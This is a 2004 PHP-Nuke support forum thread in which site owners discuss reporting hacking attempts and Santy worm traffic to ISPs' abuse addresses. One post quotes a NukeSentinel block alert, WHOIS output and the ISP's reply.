Ravens PHP Scripts: Forums
 

 

Poll
Do you report hacking attempts to abuse@ email?
Yes: 83% [ 5 ]
No: 0% [ 0 ]
What is an abuse@?: 16% [ 1 ]
Total Votes : 6


Author Message
crypto
Worker



Joined: Aug 02, 2004
Posts: 165

Posted: Sun Dec 26, 2004 1:06 pm

Do you report hacking attempts to abuse@hackers_isp.com if you found out that somebody has tried to hack or mess with your site?

I don't know whether this helps, but I'll forward NukeSentinel alerts to the abuse@ email address.
Raven
Site Admin/Owner



Joined: Aug 27, 2002
Posts: 17088

Posted: Sun Dec 26, 2004 2:47 pm

I do if it's US based. I have had reasonably good success with AOL, Comcast, and a few others.
Muffin
Client



Joined: Apr 10, 2004
Posts: 649
Location: UK

Posted: Sun Dec 26, 2004 3:54 pm

I hadn't, but I did think it would be a good idea if it could be written into Sentinel somehow.

_________________
Classic Mini rules the bends & bends the rules!
Raven







Posted: Sun Dec 26, 2004 5:12 pm

Somewhere along the line the user has to take accountability ;)
 
Muffin







Posted: Sun Dec 26, 2004 6:07 pm

Yeah, we can't rely too much on the experts lol

I'll make sure I email abuse in future then hehhee
 
manunkind
Client



Joined: Apr 26, 2004
Posts: 368
Location: Albuquerque, NM

Posted: Mon Dec 27, 2004 10:07 am

I've never done it before, but with this Santy stuff, I am now. I have gotten a pretty good response so far.
Viper-
New Member



Joined: Dec 24, 2004
Posts: 5

Posted: Mon Dec 27, 2004 10:43 pm

manunkind wrote:
I've never done it before, but with this Santy stuff, I am now. I have gotten a pretty good response so far.

Would you mind sharing some of the responses you've gotten so far and which ISPs responded?

I wouldn't mind having a list of some sort of ISPs that really do take abuse seriously and will actually respond.

Before I implemented Raven's quick fix, I had received over 500 e-mails from Sentinel banning IPs in less than 24 hours. Something like that would be hard to e-mail the various IP owners, but it's something I would do over a period of a week or so.

Thanks,

Viper

_________________
www.PHPNukeFiles.com
mds
Client



Joined: Dec 24, 2004
Posts: 194
Location: Michigan

Posted: Mon Dec 27, 2004 11:03 pm

Here's one I sent with the info and the reply to what I sent....
*EDITED FOR MY SECURITY* ;) ha ha

Merry Christmas.

Thanks for your feedback. The server in question is owned and managed
by one of our customers. He has had an intruder on the machine or been
attacked by a worm. He has fixed the problem now.


Dag Øien
Domeneshop AS



On 25 Dec 2004 at 03:29, <me@mysite.org> wrote:

> From [ Only registered users can see links on this board! Get registered or login! ] Fri Dec 24 17:59:16 2004
>
> X-Apparently-To:
> [ Only registered users can see links on this board! Get registered or login! ] via XXX.XXX.XXX.XXX; Fri, 24 Dec 2004
> 17:58:19 -0800
>
> Authentication-Results:
> XXXXXX.mail.XXX.yahoo.com from=mysite.com;
> domainkeys=neutral (no sig)
>
> X-Originating-IP:
> [XX.XXX.XXX.XXX]
>
> Return-Path:
> <root@hostXX.myhost.com>
>
> Received:
> from XXX.XXX.XXX.XXX (HELO hostXX.myhost.com) (XX.XX.XXX.XXX) by
> mta328.mail.scd.yahoo.com with SMTP; Fri, 24 Dec 2004 17:58:18 -0800
>
> Received:
> (mail XXXX invoked by uid XXXX); 25 Dec 2004 01:59:16 -0000
>
> Delivered-To:
> [ Only registered users can see links on this board! Get registered or login! ]
>
> Received:
> (mail XXXX invoked by uid XX); 25 Dec 2004 01:59:16 -0000
>
> Date:
> 25 Dec 2004 01:59:16 -0000
>
> Message-ID:
> <XXXXXXXXXX.myhost.com>
>
> To:
> [ Only registered users can see links on this board! Get registered or login! ]
>
> Subject:
> Blocked on My site.com
>
> From:
>
>
> X-Mailer:
> NukeSentinel™
>
> Content-Length:
> 797
> Date & Time: 2004-12-24 17:59:15
> Blocked IP: 194.63.250.67
> User ID: (1)
> Reason: Abuse-Script
> --------------------
> User Agent: lwp-trivial/1.41
> Query String:
> [ Only registered users can see links on this board! Get registered or login! ]
> Forwarded For: none
> Client IP: none
> Remote Address: 194.63.250.67
> Remote Port: 53540
> Request Method: GET
> --------------------
> DNSStuff
> Sorry, you have triggered our rate limiting system.
> Please try again later. If you are reading this in a web browser, we
> apologize -- we want you to use the site as much as you like. What we do
> not like is when people use automated programs with our free service.
> We have the addresses [ Only registered users can see links on this board! Get registered or login! ] and [ Only registered users can see links on this board! Get registered or login! ] here in case
> spammers are harvesting addresses from our site. If you are not
> automatically removed within a few minutes, you can contact us (using our info@
> address at the domain in the URL you are at; please refer to 43ddeb42) to
> get access again more quickly. Thanks!
>
>
> WHOIS results for 194.63.250.67
>
> Generated by [ Only registered users can see links on this board! Get registered or login! ]
> Country: EU
>
> ARIN says that this IP belongs to RIPE; I'm looking it up there.
>
>
> Using 0 day old cached answer (or, you can get fresh results).
> Hiding E-mail address (you can get results with the E-mail address).
>
> % This is the RIPE Whois query server #2.
> % The objects are in RPSL format.
> %
> % Rights restricted by copyright.
> % See [ Only registered users can see links on this board! Get registered or login! ]
>
> inetnum: 194.63.248.0 - 194.63.255.255
> netname: NO-HYPNOTECH
> descr: Hypnotech AS
> descr: Local ISP
> country: NO
> admin-c: HH2777-RIPE
> tech-c: HH2777-RIPE
> status: ASSIGNED PI
> notify: ***********@hypnotech.com
> notify: ****@global-ip.net
> mnt-by: RIPE-NCC-HM-PI-MNT
> mnt-by: GLOBALONE-MNT
> changed: **********@ripe.net 19991109
> source: RIPE
>
> route: 194.63.248.0/21
> descr: DOMENESHOP
> origin: AS12996
> notify: **********@domeneshop.no
> mnt-by: AS12996-MNT
> changed: **********@domeneshop.no 20040421
> source: RIPE
>
> role: Domeneshop Hostmaster
> address: Domeneshop AS
> address: Nedre vaskegang 6
> address: NO-0186 Oslo
> address: Norway
> phone: +47 22 94 33 33
> fax-no: +47 22 94 33 34
> e-mail: **********@domeneshop.no
> admin-c: SS784
> tech-c: SS784
> nic-hdl: HH2777-RIPE
> notify: **********@domeneshop.no
> changed: **********@domeneshop.no 20040421
> source: RIPE
>
>
>
 
All times are GMT - 6 Hours
 